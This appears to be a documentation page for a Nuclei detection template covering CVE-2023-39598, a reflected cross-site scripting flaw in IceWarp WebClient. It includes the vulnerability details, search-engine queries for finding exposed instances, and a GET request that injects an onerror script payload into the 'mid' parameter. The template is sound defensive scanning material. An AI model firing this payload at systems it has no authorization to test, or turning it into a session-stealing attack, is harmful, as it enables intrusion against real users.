IceWarp Email Client - Cross Site Scripting
ID: CVE-2023-39598
Severity: medium
Author: Imjust0
Tags: cve2023,cve,xss,icewarp
Description
Section titled “Description”Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
YAML Source
Section titled “YAML Source”id: CVE-2023-39598
info: name: IceWarp Email Client - Cross Site Scripting author: Imjust0 severity: medium description: | Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. reference: - https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c - https://nvd.nist.gov/vuln/detail/CVE-2023-39598 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598 - https://medium.com/%40muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-39598 cwe-id: CWE-79 epss-score: 0.05054 epss-percentile: 0.92885 cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: icewarp product: webclient shodan-query: - title:"icewarp" - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" tags: cve2023,cve,xss,icewarp
http: - method: GET path: - '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'
matchers-condition: and matchers: - type: word words: - "<img src=x onerror=confirm(document.domain)>" - "icewarp" condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a0047304502204529e15f34e3d44c08c29798588d94c861be93285efa08aa0340e845ce5c499a022100e2677a86c47b856b697789bfac44fca3b043d458a27d8647b4df23d41cdcbb6a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39598.yaml"